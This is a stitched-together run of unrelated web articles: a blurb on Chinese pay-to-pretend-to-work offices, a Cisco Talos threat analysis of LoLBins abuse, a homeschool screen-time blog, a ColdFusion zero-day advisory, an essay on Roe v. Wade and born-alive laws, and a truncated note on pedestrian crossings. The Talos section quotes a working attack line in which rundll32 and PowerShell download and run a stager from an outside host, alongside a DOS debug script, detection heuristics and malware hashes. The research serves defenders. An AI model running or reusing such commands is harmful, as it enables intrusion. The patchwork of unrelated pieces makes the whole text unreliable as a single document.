quantro

But in the country’s large cities, spaces that offer the solution have begun to spring up: companies that allow people to pretend to work.

For a daily fee of between 30 and 50 yuan ($4-$7), these companies offer desks, Wi-Fi, coffee, lunch, and an atmosphere that mimics any work environment. According to a report in Beijing Youth Daily, although there are no contracts or bosses, some firms simulate them: fictitious tasks are assigned and supervisory rounds are even organized. For a fee, the theatricality can reach unimaginable levels, from pretending to be a manager with his own office to staging episodes of rebellion against a superior.

Zonghua is Cantonese and prefers not to give her real name. Tired of traveling and the pressures of the financial world, she resigned from her position in the spring of 2024, she tells this newspaper via a local social media platform. “I was looking for a more stable life,” she writes. But she doesn’t dare tell her family the truth. At first, she went to libraries, but for the past few months, she has been paying a monthly fee of 400 yuan ($55) for a comfortable space to spend the day; it’s much cheaper than spending hours in a cafe. Zonghua doesn’t know how much longer this situation will last, as, for now, she’s not having any “success” with her applications.

Here is the full story, not unrelated to UBI debates either.  Via R.

The post China markets in everything appeared first on Marginal REVOLUTION.

By Vanja Svajcer.

Introduction

Attackers' trends tend to come and go. But one popular technique we're seeing at this time is the use of living-off-the-land binaries — or "LoLBins". LoLBins are used by different actors combined with fileless malware and legitimate cloud services to improve chances of staying undetected within an organisation, usually during post-exploitation attack phases.

Living-off-the-land tactics mean that attackers are using pre-installed tools to carry out their work. This makes it more difficult for defenders to detect attacks and researchers to identify the attackers behind the campaign. In the attacks we're seeing, there are binaries supplied by the victim's operating system that are normally used for legitimate purposes, but in these cases, are being abused by the attackers.

In this post, we will take a look at the use of LOLBins through the lense of Cisco's product telemetry. We'll also walk through the most frequently abused Windows system binaries and measure their usage by analyzing data from Cisco AMP for Endpoints.

You'll also find an overview of a few recent campaigns we've seen using LoLBins, along with recommendations for how to detect malicious LoLBins' activities.

What are LoLBins

A LoLBin is any binary supplied by the operating system that is normally used for legitimate purposes but can also be abused by malicious actors. Several default system binaries have unexpected side effects, which may allow attackers to hide their activities post-exploitation.

The concept of LoLBins is not new and isn't specific to Windows. Almost all conventional operating systems, starting from the early DOS versions and Unix systems, contained executables that attackers could exploit.

Here is an example from the mid 80s in which binary code to reboot the computer was supplied to the default debug.com DOS debugger as text, designed to avoid detection by anti-malware scanners and run malicious code as intended.

N SET.COM
A 100
MOV AX,0040
MOV DS,AX
MOV AX,1234
MOV [0072],AX
JMP F000:FFF0

RCX
10
W
Q

In their presentation at DerbyCon 3, Matthew Graeber and Christopher Campbell set the baseline for Windows, by discussing the advantages of using default Windows binaries to conduct red team activities and avoiding defensive mechanisms.

In this post, we also focus on Windows LoLBins and their usage today.

Overall, attackers can use LoLBins to:

• Download and install malicious code
• Executing malicious code
• Bypassing UAC
• Bypassing application control such as (WDAC)

Attackers may be able to target other utilities that are often pre-installed by system manufacturers and may be discovered during reconnaissance. These executables can be signed utilities such as updaters, configuration programs and various third party drivers.

The usage of LoLBins has been frequently combined with legitimate cloud services such as GitHub, Pastebin, Amazon S3 storage and cloud drives such as Dropbox, Box and Google Drive. By using legitimate cloud services for storage of malicious code, command and control (C2) infrastructure and data exfiltration attackers activities are more likely to remain undetected as the generated traffic does not differ from the traffic generated by systems that are not compromised.

Talos is mainly interested in finding executables that can be used to download or execute malicious code. In our research, we monitor daily execution patterns of the following executables to detect their abuse:

• powershell.exe
• bitsadmin.exe
• certutil.exe
• psexec.exe
• wmic.exe
• mshta.exe
• mofcomp.exe
• cmstp.exe
• windbg.exe
• cdb.exe
• msbuild.exe
• csc.exe
• regsvr32.exe

Abusing PowerShell

A primary suspect for malicious code download and in-memory execution in the recent period is PowerShell. Threat actors commonly use this command shell, which is built on the Windows management and .NET frameworks. This powerful administration environment has a security policy that can prevent the execution of untrusted code. Unfortunately, this policy can be easily circumvented with a single command line option.

One could argue that the execution of PowerShell with the option to bypass security policy should be outright blocked. However, there are a number of legitimate tools, such as Chocolatey package manager and some system management tools that use the exact command line.

PowerShell's code is not case-sensitive, and it will accept shortened versions of command-line options, as long as the option isn't ambiguous. For example -EncodedCommand option, which accepts a Base64-encoded string as a parameter can also be invoked as -EncodedC or even -enc, which is commonly used by malicious actors.

Popular malware like Sodinokibi and Gandcrab have used reflect DLL loaders in the past that allows attackers to load a dynamic library into process memory without using Windows API.

The Invoke-Obfuscation module is often used to create polymorphic obfuscated variants, which will not be detected by antivirus programs and other defensive mechanisms.

Over time, attackers have also realized the malicious potential of PowerShell, widening the number of executables used as LoLBins. Msbuild.exe and C# compiler csc.exe are some of the most frequently used by red teams. Both are frequently used to download, build and load malicious code that is built for that particular system and does not appear on any executable block list.

Measuring LoLBins usage

We analyzed telemetry provided from Cisco AMP for Endpoints to measure how often LoLBins are abused. The telemetry, sent over a secure channel, contains names of invoked processes and cryptographic checksums of their file images which helps us with tracking file trajectories and building parent-child process relationships that can be used for hunting.


The telemetry data is focused on detecting new attacks as they happen but it should also allow us to measure how many potential LoLBin invocations are suspicious.

We looked at different LoLBins where the decision could be made quickly. In all cases, we're assuming the worst-case scenario and designated any invocation of the following processes with a URL as a parameter as suspicious:

• mshta.exe
• certutil.exe
• bitsadmin.exe
• regsvr32.exe
• powershell.exe

Our relaxed definition of suspicious process invocation means that it will also have a significant false-positive rate. For example, for PowerShell invocations with a URL in the command line, we estimate that only 7 percent of the initially chosen calls should be checked in-depth and are likely to be malicious.

We obtain the percentage of suspicious calls by mining billions of daily data points and dividing the number of detected suspicious calls with the overall number of calls. Overall, our worst-case scenario shows that at least 99.8 percent of all LoLBins invocations are not worth further investigation.


We then distilled down these potentially suspicious calls to find the ones that are likely to be malicious.

Once again, we will take PowerShell. The worst figure for potentially suspicious PowerShell process executions was 0.2 percent. However, as mentioned before, only 7 percent of those actually require in-depth investigation, which brings the percentage down to 0.014 percent. Therefore, at least 99.986 percent of PowerShell invocations are legitimate.

A simple rule of thumb for URLs that can be used to pinpoint calls that are more likely to be malicious is to look for LoLBins invocation combined with:

• External numeric IP address
• Any .net TLD
• Any .eu TLD
• Any .ru TLD
• Any URL ending with an executable or image extension (e.g. .EXE, .LNK, .DLL, .JPG, .PNG etc.)
• Any reference to Pastebin.com and its clones
• Any reference to Github or any other source code repository sites

Red teams' activities

Although the majority of recorded suspicious calls belong to malicious actors, it is worth noting that red-team activities are also visible. Here, security teams and penetration testers are often using adversarial simulation frameworks such as Red Canary Atomic tests to test the organizational defenses against tools, techniques and processes as classified in the ATT&CK knowledge base.

Some red team tools are tailored to mimic the activity of popular tools such as Mimikatz. Here is an example of a tailor-made script hosted on GitHub to emulate the adversarial technique of using a reputable domain to store malicious code.

LoLBins actors' skill levels

In this section, we'll describe three individual campaigns, showing usage of PowerShell combined with memory-only code from three different actors with different skill sets. These campaigns can be relatively easily detected by internal hunting teams by analyzing command lines and their options.

Case 1: Common ransomware

The first case involves the Sodinokibi ransomware. Sodinokibi is a rather common ransomware that spreads by using standard methods like phishing and exploit kits, as well as exploiting vulnerabilities in web frameworks such as WebLogic.

We see from telemetry that PowerShell is launched with Invoke-Expression cmdlet evaluating code downloaded from a Pastebin web page using the Net.WebClient.DownloadString function, which downloads a web page as a string and stores it in memory.


The downloaded code is a reflective DLL loader with randomized function names to avoid simple pattern-based detection engines. The ransomware payload is Base64-encoded and stored in the variable $PEBytes32. It is worth noting that Base64 executable payloads can be instantly recognized by the initial two characters "TV," which get decoded into characters "MZ" for the start of DOS executable stub of a PE32+ executable file.


Sodinokibi and Gandcrab are very common, but that does not mean that the actors behind them are not technically proficient. Although they use off-the-shelf techniques to spread and execute payloads, we can still estimate that they have an intermediate skill level.

Case 2: Intermediate miner

Our second actor used the PowerShell ability to obfuscate code and deobfuscate several layers of obfuscation in memory before reaching the actual PowerShell script that installs and launches a cryptocurrency-mining payload.

The Invoke-Obfuscation module is often used for PowerShell obfuscation. Apart from obfuscating the whole next layer script code, it also hides the invocation on Invoke-Expression (IEX) cmdlet. In this example, the $Env:COMSpec variable contains the string "C:\Windows\System\cmd.exe" so that joined fourth, 15th and 25th character form the string "iex."

This cryptocurrency miner had five deobfuscation stages and in the final one, the invocation of IEX was hidden by getting the name of the variable MaximumDriveCount using "gv" (Get-Variable cmdlet) with the parameter "*mdr*" and choosing characters 3, 11 and 2 to form it.


The downloaded PowerShell scripts contain the functionality to disable Windows Defender, Malwarebytes and Sophos anti-malware software, to install modified XMRig cryptocurrency payload and download modules with the intention to steal user credentials from memory and use the credentials to attempt to spread laterally by passing the hash (Invoke-TheHash) through SMB or WMI.

Case 3: Hiding Cobalt Strike in network traffic

Our final case study shows the activities of a more advanced actor. The actor uses Cobalt Strike beacon for their post-exploitation activities with a PowerShell stager taken from the Cobalt Strike framework.

The telemetry shows this attack launched by abusing rundll32.exe and the command line invoking JScript code to download a web page and launch the initial PowerShell stager.

rundll32.exe javascript:\\..\\mshtml,RunHTMLApplication ;document.write();new%20ActiveXObject(WScript.Shell).Run(powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('hxxps://stjohnplece.co/lll/webax.js');

The first PowerShell stage, webax.js, despite misleading filename extension, decompresses the second-stage PowerShell code that loads the first shellcode stage into memory and creates a specific request to download what seems like a standard jQuery JavaScript library.


The shellcode creates an HTTP GET request to the IP address 134.209.176.24, but with header fields that indicate that the host we are looking for is code.jquery.com, the legitimate host serving jQuery. This technique seems to successfully bypass some automated execution environments which in their analysis results show that the request went to the legitimate host and not to the malicious IP address.


The downloaded malicious jQuery starts with the actual jQuery code in the first 4,015 bytes, followed by the obfuscated Cobalt Strike beacon, which gets deobfuscated with a static XOR key and loaded into memory using reflective loading techniques.



The malicious jQuery ends with 1,520 bytes of the actual jQuery code, presumably to avoid anti-malware scanners scanning the request top and tail.

This technique of hiding binary payload within jQuery library and evasion of malicious IP address detection shows that we are dealing with a more advanced actor, which takes their operational security seriously.

Overall, we cannot pinpoint a single type of actor that focuses on using LoLBins. Although they may have been used only by more advanced actors, today they are also used by actors employing common malicious code such as ransomware or cryptominers.

Detecting and preventing LoLBins abuse

The protection against abuse of LoLBins combined with fileless code is difficult for security controls that do not monitor process behavior. The abuse can be detected based on the parent-child relationship of the launched processes as well as anomalies in network activity of processes that are not usually associated with network communication.

Organizations are advised to configure their systems for centralized logging where further analytics can be performed by hunting teams. Since version 5, PowerShell can also be configured to log execution of all executed code blocks to Windows event log. This allows members of security teams to understand obfuscated code which needs to be deobfuscated before it is run. The execution of the deobfuscated code will be visible in Windows event logs.

However, the best possible protection is to deny the execution of LoLBins using mechanisms such as Windows Defender Application Control. Microsoft created a policy block file, which will block the execution of LoLBins not required on protected systems.

Unfortunately, blocking all LoLBins is not possible in most environments since they are also required by legitimate processes.

Conclusion

Our research shows that many types of actors are employing various techniques to use LoLBins in their activities, from commodity malware to more targeted attacks. However, the overall proportion of malicious usage is very low (below 0.2 percent), which is not enough to block all invocations of LoLBins.

However, blue team members must keep LoLBins in mind while conducting regular hunting activities. If used successfully, an attacker can use these to make their attacks more difficult to trace or make their malware linger for longer on the victim machine.

Coverage

It is advisable to employ endpoint detection and response tools (EDR) such as Cisco AMP for Endpoints, which gives users the ability to track process invocation and inspect processes. Try AMP for free here.

Additional ways our customers can detect and block these threats are listed below.



Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IoCs

Sodinokibi

dc3de6cff67f4bcb360d9fdd0fd5bd0d6afca0e1518171b8e364bb64c5446bb1
dc788044ba918463ddea34c1128c9f4da56e0778e582ae9abdeb15fdbcc57e80

Xmrig related

4528341b513fb216e06899a24d3560b89636158432ba7a0a118caa992739690e
c4ef0e90f81bac29899070d872e9ddea4531dbb5a18cdae090c19260cb0d4d83
e0ffda3353a17f5c9b7ef1d9c51f7dc1dcece1dfa2bcc8e1c93c27e5dde3b468
3f8d2e37a2bd83073e61ad4fc55536007076ae59a774b5d0c194a2bfab176172
92f0a4e2b7f4fe9d4ea373e63d9b08f4c2f21b2fd6532226c3fd576647efd64a
ebb7d224017d72d9f7462db541ac3dde38d2e7ecebfc9dca52b929373793590

Cobalt strike stager

522b99b5314531af6658e01ab471e1a7e0a5aa3a6ec100671dcfa0a6b0a1f52d
4c1a9ba633f739434cc81f23de9c6c1c12cdeacd985b96404a4c2bae2e54b0f5
f09d5ca3dfc53c1a6b61227646241847c5621b55f72ca9284f85abf5d0f06d35

Raising Arrows
How to Set Screen Time Limits When You Homeschool

In the modern age of homeschooling, it isn’t uncommon to use modern technology to supplement and even teach certain subjects in our homeschools. However, for many parents, this presents a new problem – how to find the balance between educational screen time and entertainment screen time. This post helps you set guidelines and parameters that work for your family!

---

This post is sponsored by Reading Eggs.
Check out their 4 Week FREE Trial Offer HERE >>

---

Years ago, I wrote a post about how we handled screen time in our family. However, that post is quite outdated because things have dramatically changed since those days! My children are no long all little, I have adult children living in the home, and more and more of our schoolwork is done on the computer, or supplemented by online sites and resources.

And there are WAY more screens in our home than there used to be.

Among the 10 people currently living in our home, there are 14 devices available – from computers to laptops to phones and tablets and of course, the smart TV in the living room that is also connected to the internet. A few years ago, I would have said that was excessive, but from where I stand now, it feels pretty normal.

In fact, I want to be clear in this post – what works for us isn’t the ONLY way to manage screen time. Some of you will find our screen time notions quite lenient, and others will find them entirely too restrictive. Only you and your family can define your boundaries and rules for Screen Time.

---

WARNING SIGNS THERE MIGHT BE TOO MUCH SCREEN TIME

1 – Your child cries when it is time to shut off the screens.

2 – Your child yells at you when you take away a screen time privilege.

3 – Your child wakes up and goes to bed at night asking for screen time (and a lot of their day is spent asking for a device to watch or play on).

4 – You hand your child your phone or tablet as soon as they fuss.

5 – You find yourself “giving in” to your child’s demands for devices simply to “keep the peace.”

6 – You just “know” they are on devices too much. (Because honestly, we usually DO know.)

---

Most likely, if you are reading this you think your family “might” have a problem, so let’s walk through this because when you homeschool, it isn’t a simple matter of limiting game time and watching less TV. There’s all that schoolwork to take into account. Let’s start there…

How much time should a homeschooler be on the computer for school?

Once upon a time, I might have said, “NONE!” But now that I have older kids and more kids in general, I’ve changed my tune! Computer schooling is an invaluable tool for homeschool parents.

• It can take over subjects mom doesn’t feel qualified to teach.
• It can help mom redeem more time.
• It can be a quick resource for difficult questions.
• It is a great audio-visual supplement.
• and the list goes on!

But, it does mean our homeschooled children are spending more time in front of a screen than we may have anticipated or even hoped for. We don’t need to feel guilty about this, we simply need to place some limits and boundaries on these tools.

Here’s a peek at how devices play a role in our homeschool without being pervasive…

Morning Time:

Only Mom is allowed a screen during Morning Time. I use it to show clips and images of things we are discussing and our actual Morning Time lessons are housed on my computer.

READ >> Homeschool Garden Morning Time Review

Young Children:

My younger children have 2 subjects they do on a screen, but only Math is done every day. Reading Eggs is a supplement I use for my early readers and those needing a little work on their reading skills.

Reading Eggs is NOT an every day app. It is used at my discretion, which usually means 2-3x a week, and it is ALWAYS used AFTER other school work is finished. In many ways, we use it as a REWARD and typically only allow 1 lesson to be completed at a time.

Total time on screen for young homeschoolers = 30-45 minutes

---

TRY A 4 WEEK FREE TRIAL OF READING EGGS ON ME!
(click the graphic below!)

---

Older Children:

My older children do Math and Typing on the computer. They sometimes work on projects on the computer as well. Math and Typing together only take about 45-60 minutes. If there is a projects, I will allow another hour on the computer.

Total time on screen for older homeschoolers = 45 minutes – 2 hours

READ >> Homeschooling High School in a Large Family

Basically, I prefer my students are not on the computer more than 2 hours for school. In special cases, I will allow for more time (like when my oldest daughter was working on editing photos for a school project), but I have them take regular breaks to avoid eye strain (and frustration!).

TIP:
Teach your kids the 20-20-20 rule to help with eye strain.

QUESTION: What if I need my kids to do ALL of their school on the computer?

Sometimes circumstances require all of our children’s school be done on the computer. For younger children, this still shouldn’t take more than 2 hours. If it is taking longer than that, you probably need to intervene and find a way to cut back.

For older children, it may take closer to 4 hours if all of their homeschooling is done on a screen. If this is the case…

• Have them take regular breaks.
• Make sure they aren’t dawdling. (check on them regularly)
• Don’t allow other screens in the area. (even an extremely focused child will take longer if distracted by other screens)

Now that we’ve established educational parameters, it’s time to talk about entertainment.

How much time should kids spend on screens for entertainment purposes?

Again, there is no fixed answer. Reread the warning signs at the beginning of this post, and proceed at your own pace with your own family in mind.

Oh, wait…one more warning…this time from the American Heart Association…

Kids and teens age 8 to 18 spend an average of more than seven hours a day looking at screens. The new warning from the AHA recommends parents limit screen time for kids to a maximum of just two hours per day. For younger children, age 2 to 5, the recommended limit is one hour per day.

https://www.cbsnews.com/news/parents-need-to-drastically-cut-kids-screen-time-devices-american-heart-association/

Now, obviously, the AHA is concerned about heart disease and obesity which is “linked” to how much time a child spends on a screen during the day. I would submit that it’s not really linked to the amount of time spent on a screen, but rather the amount of time NOT spent playing.

ALL children should be spending more time playing regardless of screen time amounts. Cutting down on screen time without implementing other healthy habits isn’t going to change anything.

That said, I have found when my children are on devices more, they are less creative and less likely to find creative ways to play. Kids need to be bored often enough and for long enough that they come up with something else to do. Thus the reason we have tight restrictions on screen time for entertainment purposes in our home.

Our Screen Time rules:

No devices until 4pm. (adult children must not use their phones prior to 4pm for entertainment purposes that are enticing to their younger siblings. i.e. watching YouTube videos, playing games, etc.)

No earbuds unless sanctioned by Mom or Dad. (For 2 reasons – it keeps them from hiding what they are listening to and it protects their ears.)

Television Time for the littles begins at 4pm, but the house must be tidy! Every day, without fail, the house is cleaned prior to the 4pm TV Time. If I notice something hasn’t been cleaned, I shut the TV off and they try again.

Each child takes a turn choosing a show to watch (starting from the youngest) until dinner is served. In my home the children watching TV at 4pm are ages 3,4,6,9, and 10. The older children do not watch TV at this time, but they are allowed on their computers, phones, or tablets. If dinner is served before you get a turn to choose, you get first dibs the following day.

TV Time does not trump Mom and Dad. If we need a child to load a dishwasher, feed a dog, help with dinner, or come along on an errand, TV Time does not null and void these requests. And if you whine, chances are you won’t be returning to the living room to watch anything else. We will; however, honor requests to “wait until this show is over” if it is not an emergency and you asked nicely.

TV Time after dinner is for older kids and parents. It’s still family friendly, but it’s not a cartoon.

Games are for weekends. There are NO video games allowed during the weekdays unless it is your Special Night. On Fridays, the little kids get an hour each to play games on the computer or phone. The older kids usually use up their time on Saturdays. My adult daughter is allowed 2 nights a week to play a game with friends online. All we ask of her is to avoid staying up too late.

NOTE: We occasionally allow our little kids to “trade in” their weekday TV time for a game on the Wii. My mom gave the kids her Wii, which is all sports. I’m ok with this because they are up and moving around.

No screens in bedrooms, unless you are an adult. I don’t like devices in bedrooms. We’ve never had computers in bedrooms or allowed iPads or phones to be in bedrooms. Parents and adult siblings are the exception to this rule. My office is in my bedroom and most of us use our phones as alarms for work and college.

Screen Time is a privilege, and it’s the first thing to go if you need to be disciplined. Nobody “needs” entertainment-based Screen Time; therefore, it is a privilege, not a right. For the younger boys in particular, it is the first thing taken away if they misbehave.

These rules have worked well for us for several years now. I don’t see a lot of bad behavior when I ask the kids to shut off their screens. I don’t have kids asking non-stop to get on a device (it helps to have a timeline for them!), and I definitely see them using their imaginations and being creative.

---

Other ideas for Screen Time

*Some parents opt to make Screen Time for entertainment purposes purely a reward system. Plays outside for 20 minutes = Receive 20 minutes of Screen Time. Do your schoolwork without dawdling = 30 minutes of Screen Time.

Personally, I couldn’t keep up with this way of managing Screen Time. I have 10 kids and I don’t like spreadsheets, which is what it would take to keep track of the monstrosity this would become!

*Some parents have days set aside for specific things or specific children. We used to do Monday, Wednesday, Friday as TV days. This was back when the kids were all little and went to bed early. Now that I have a mix of bigs and littles, this doesn’t work. (Thus the reason I had to revisit this topic!)

*Some parents opt to avoid the screen entirely until a certain age. This works great if you only have a couple of kids and they are close in age. You can wait to introduce the concept of Screen Time until they are much older. Unfortunately, this was easier 20 years ago when my son was little. Now it’s near impossible unless you yourself avoid all screens as well.

---

Frankly, I don’t believe the world of technology is inherently evil. But, I do think we have a difficult time controlling ourselves around our devices.

Technology contains an addictive allure that easily becomes all-consuming if we don’t keep a close eye on it. It is a matter of self-governing, and being able to recognize when moderation has been exceeded. However, little kids don’t self-govern. In fact, a lot of adults don’t either.

When our children are young, it’s our responsibility to keep screens in check. As our children grow older, we have to lift those restrictions little by little and let them try things out on their own.

So far, both of my adult children have made some mistakes when it comes to managing their devices and their time spent on them.

But, that’s ok.
So have I!

I remember how much time I spent online working on this blog from 2011-2013. It was too much. I still have to keep an eye on my screen time, but I know what too much looks like, and God has always been faithful to give me a little nudge when I cross that line.

So, in short…

• Don’t feel guilty about taking advantage of the screen-based opportunities we have for homeschooling.
• Make sure your children take breaks from the screen.
• Put reasonable parameters in place for entertainment-based screen time.
• And when in doubt, go with your gut – it’s probably right!

Try out Reading Eggs for FREE!

Learn how Reading Eggs helped my struggling reader!

How to Set Screen Time Limits When You Homeschool
Amy

Adobe has released out-of-band updates to address a critical flaw in
ColdFusion web application development platform that has been exploited in the wild.

Adobe has released out-of-band updates to address a zero-day vulnerability in the ColdFusion web application development platform that has been exploited in the wild.

The vulnerability, tracked as CVE-2019-7816, has been described by the vendor as a file upload restriction bypass issue that could lead to arbitrary code execution in the context of the ColdFusion service.

“Adobe has released security updates for ColdFusion versions 2018, 2016 and 11. These updates resolve a critical vulnerability that could lead to arbitrary code execution in the context of the running ColdFusion service. ” reads the security advisory published by Adobe.  

“Adobe is aware of a report that CVE-2019-7816 has been exploited in the wild.” 

The zero-day vulnerability has been addressed in ColdFusion 11, ColdFusion 2016 and ColdFusion 2018.

The company is urging users to install the updates and to apply security configuration settings reported lockdown guides and the ColdFusion security page.

The flaw allows an attacker to upload executable code to a directory than is accessible online, and then execute that code via an HTTP request.

“This attack requires the ability to upload executable code to a web-accessible directory, and then execute that code via an HTTP request. Restricting requests to directories where uploaded files are stored will mitigate this attack,” reads a note published by Adobe in the advisory.

The company did not provide additional details about the attacks leveraging this zero-day.

Adobe credited Charlie Arehart, Moshe Ruzin, Josh Ford, Jason Solarek and Bridge Catalog Team for reporting the vulnerability.

In November, another flaw in ColdFusion was exploited by threat actors in attacks in the wild. Security experts from Volexity reported that attackers in the wild were exploiting a recently patched remote code execution vulnerability affecting the Adobe ColdFusion.

The flaw, tracked as CVE-2018-15961, is an unrestricted file upload vulnerability, successful exploitation could lead to arbitrary code execution.

The vulnerability was reported by Pete Freitag of Foundeo and addressed in September by Adobe (security bulletin APSB18-33).

Researchers from Volexity uncovered a Chinese-based APT group exploiting the vulnerability to upload the China Chopper webshell to a vulnerable server.

The analysis of the hacked server revealed that it had all ColdFusion updates installed, except for the CVE-2018-15961 fix. Attackers exploited the flaw, a couple of weeks after Adobe released the security patches.

Pierluigi Paganini

(SecurityAffairs – Adobe,hacking)

The post Adobe releases patches to address ColdFusion 0day exploited in the Wild appeared first on Security Affairs.

Virginia Governor Ralph Northam offered a qualified defense of infanticide when commenting recently on a proposed bill that would loosen restrictions on late-term abortion in his state. If a mother were in labor and nonetheless elected abortion, Northam said,

I can tell you exactly what would happen. The infant would be delivered. The infant would be kept comfortable. The infant would be resuscitated if that’s what the mother and the family desired. And then a discussion would ensue between the physicians and the mother.

As the public conversation focused in on Northam’s comments, before they were quickly overshadowed by the discovery of a shockingly racist photo from his medical school yearbook page, the Governor’s office released a statement that third-trimester abortions always arise in

tragic or difficult circumstances, such as a nonviable pregnancy or in the event of severe fetal abnormalities, and the governor’s comments were limited to the actions physicians would take in the event that a woman in those circumstances went into labor.

The Governor’s clarifying statement inadvertently brought to the table this clarifying question: is an infant, marked for abortion but delivered alive, even in tragic circumstances, a person whom the law ought to protect? Grappling seriously with this question takes us very quickly to the heart of the debate over Roe v. Wade and its legacy today.

In Roe, the Supreme Court invalidated Texas’s century-old abortion statute (which had allowed abortion only if a mother’s life was threatened by continued pregnancy). When coupled with a companion holding in Doe v. Bolton, decided the same day, the court’s new jurisprudence allowed abortion at any time during pregnancy if a physician deemed it necessary to preserve a woman’s health, understood “in light of all factors—physical, emotional, psychological, familial, and the woman’s age.” Doe’s broad health exception served to unravel any meaningful categorical gestational limits on abortion in state law.

Personhood and Constitutional Rights

Critical to the decision in Roe was the premise that unborn children are not constitutional persons. If it “were established that an unborn fetus is a person within the protection of the Fourteenth Amendment,” Justice Potter Stewart commented during oral arguments, then the challenge to Texas’s law would be “almost an impossible case.” As a preliminary issue, then, the Court insisted early in its Roe opinion that “the word ‘person,’ as used in the Fourteenth Amendment, does not include the unborn.” Roe’s attorney, Sarah Weddington, put the matter more pointedly during oral arguments. Prior to birth, she claimed, children in the womb are left “unprotected by any kind of federal constitutional rights.”

Of course, many judicial conservatives, such as the late Antonin Scalia, have also held that the federal constitution offers no protection to unborn human beings and would therefore leave the matter of abortion entirely to the discretion and judgment of state legislatures. Yet the Roe Court took that same beginning premise far in the other direction by insisting that the Fourteenth Amendment secures a fundamental constitutional right to abortion that cannot be abrogated by state legislation. The dual assertions that constitutional personhood begins only at birth and that abortion is a fundamental constitutional right caused some to question, even in 1973, the moral and legal significance of birth and whether the decision would open the door to legal infanticide.

What Distinguishes Abortion from Fetal Homicide?

Reflecting on the state of the academic debate during the decade preceding Roe, Michael Tooley observed in a 1972 article in the journal Philosophy & Public Affairs that it “seems very difficult to formulate a completely satisfactory liberal position on abortion without coming to grips with infanticide.” Tooley’s position, shared today by several other prominent philosophers and ethicists such as Peter Singer and Francesca Minerva, is that there is no morally relevant fact that would distinguish abortion from infanticide. Tooley and others, therefore, defend infanticide as a principled corollary to the acceptance of abortion. Pro-life philosophers agree, of course, but insist that both abortion and infanticide are equally instances of the unjust taking of human life, actions that violate what Sen. Josh Hawley recently called our “founding belief in the equal worth and equal dignity of all.”

Consistency does not make the same demands in politics as it does in philosophy, however, and the political and legal debate about abortion has lagged for many years behind the philosophical debate. When the case of Roe v. Wade was being litigated, Texas law specifically provided:

Whoever shall during parturition of the mother destroy the vitality of life in a child in a state of being born before actual birth, which child would otherwise have been born alive, shall be confined in the penitentiary for life or for not less than five years.

During oral arguments in Roe, Justice Thurgood Marshall asked specifically about the parturition provision in Texas’s criminal abortion code, which led to the following exchange with Texas Attorney General Robert Flowers:

JUSTICE MARSHALL: What does that statute mean?
FLOWERS: Sir?
JUSTICE MARSHALL: What does it mean?
FLOWERS: I would think that –
JUSTICE STEWART: That it is an offense to kill a child in the process of childbirth?
FLOWERS: Yes sir. It would be immediately before childbirth, or right in the proximity of the child being born.
JUSTICE MARSHALL: Which is not an abortion.
FLOWERS: Which is not—would not be an abortion, yes, sir. You’re correct, sir. It would be homicide.

The discussion between Justices Marshall and Stewart and Attorney General Flowers indicates that abortion during the process of, and immediately after, birth would be a species of homicide rather than constitutionally protected abortion.

Although Marshall and Stewart’s comments were certainly politic for the occasion, many of the debates about abortion over the last forty-five years have been about the logical implications and outer limits of the jurisprudence undergirding Roe v. Wade. Twelve years after the decision, for example, a Texas physician was sentenced to fifteen years in prison for delivering an infant girl by hysterectomy and then drowning her in a bucket of water. In the Texas case of Showery v. State (1985), attorneys for the doctor argued that according to the logic of Roe an infant marked for abortion but born alive was “a non-individual” left unprotected by the state’s criminal prohibition of homicide.

The Texas district court sustained the doctor’s conviction, but other prominent examples of so-called live-birth abortion came to light across the country, and the public was confronted with a serious question: Did a right to abortion include a right to “abort” a child after she was born?

“Born Alive” Legislation

Roe’s opponents soon focused their attention on what Hadley Arkes—the primary architect of the federal Born-Alive Infants Protection Act (2002)—called a “modest first step”: the legal protection of a child who was inadvertently born alive during an attempted abortion procedure. The effort to protect in federal law infants born alive had a broad pedagogical purpose. To say “why the child bears an intrinsic dignity,” Arkes later explained in his memoir, is “to put in place the premise that would finally undercut, or dissolve, the ‘right to abortion’ and all of the jurisprudence built upon that slogan.” After Governor Northam’s comments, Senator Ben Sasse has recently renewed calls to pass a bill with similar pedagogical aims. The Born-Alive Abortion Survivors Protection Act would require medical professionals to “exercise the same degree of professional skill, care, and diligence to preserve the life and health of the child” as one would for “any other child born alive at the same gestational age.”

Bills like the Born-Alive Infants Protection Act and the Born-Alive Abortion Survivors Protection Act put proponents of legal abortion in an awkward position. Although few politicians would readily go on record supporting a right to infanticide, the principles implicit in the born-alive legislation clearly threatened the logic of abortion rights. While serving in the Illinois Senate, Barack Obama responded to a state-level born-alive act by protesting any bill that would “fully recognize as a human person” a baby born during a failed abortion procedure. Obama worried that protecting “a fetus or child—as some might describe it” who was “still temporarily alive outside the womb” would imply that “they are persons entitled to the kinds of protections that would be provided to a—a child, a nine-month-old—child that was delivered to term.” Senator Obama perceived the danger this principle would pose to the abortion regime built upon Roe. When the bill came up for debate again the following year, Obama declared flatly that the “issue ultimately is about abortion and not live births.”

So it is. Or, at least, the two issues are not easily disentangled. The modern controversies about abortion and infanticide were born together in an inauspicious hour, and the protection in law of a child immediately after birth sits uneasily and uncomfortably by the premises undergirding the right to abortion. Taking such a modest step at this moment as ensuring the care of an infant born alive would continue to establish premises aimed first to contain and then to roll back the logic set in motion in Roe v. Wade.

Have you heard of pedestrian scrambles? I’ve become something of an evangelist for them after moving to a city that employs them liberally. Cambridge, Massachusetts—which local signage labels a “highly settled” area as you enter the city limits—is packed with university students, families and a whole variety of people, many of whom regularly travel on foot. Parking is a pain here, driving is stressful, and the public transit isn’t amazing, but fortunately, the area is small enough that walking becomes a really easy option. (Biking is pretty fantastic here, too, but that’s for another article.)

So the need to keep pedestrians safe, amongst fast drivers and winding streets with sometimes-narrow sidewalks, is paramount.

The famous scramble crossing in Shibuya, Tokyo, Japan. (Source: Dimitry B. via Flickr)

